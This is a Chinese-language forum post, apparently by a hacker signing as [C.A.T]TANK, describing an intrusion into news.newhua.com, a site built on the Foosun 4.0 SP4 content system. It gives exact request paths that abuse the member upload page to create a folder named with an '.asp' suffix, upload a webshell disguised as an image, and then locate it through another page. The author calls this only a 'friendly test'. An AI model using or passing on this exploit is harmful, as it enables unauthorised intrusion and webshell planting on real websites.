news.newhua.com  他用的是风讯4.0 SP4 建的  SQL数据库

当然 http://news.newhua.com/Foosun_data/fs400.mdb  只是废库

发现他的会员目录 /User/ 还存在  看了一下版本 SP4    上传被限制掉了  按扭都不见啦  呵呵

管理员当然也不会那么傻...等你去入侵他啊~

遇到这中情形 不要放弃....  我也是发现好长时间了....都没搞下 ,,,,,

那天下午  想到那个上传的文件....User/CommPages/Frame.asp 

我们登陆会员进去  有了Cookies  直接访问

User/CommPages/Frame.asp?FileName=UpFileForm.asp&Path=/UserFiles/这后面写你的用户编号.asp

回车后 系统自动建个 后辍为;.asp的文件夹    上传小马  图片格式的  windows系统有效  多余的就不说了

传完马后  继续下一步 :要找到刚才传的小马  因为系统把文件名自动起名了.....

我们再访问下这个  就可以看到自己的小马了

User/CommPages/SelectPic.asp?CurrPath=/UserFiles/2519079D7D6.asp&f_UserNumber=2519079D7D6

呵呵  很简单吧   


                                    [C.A.T]TANK      只是对华军友情检测了一次~  很多人说挂了马  那是没有的事! 

  C.A.T联盟 http://www.catunion.org/

用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; QQDownload 1.7; InfoPath.2)

很红很强大～

没事做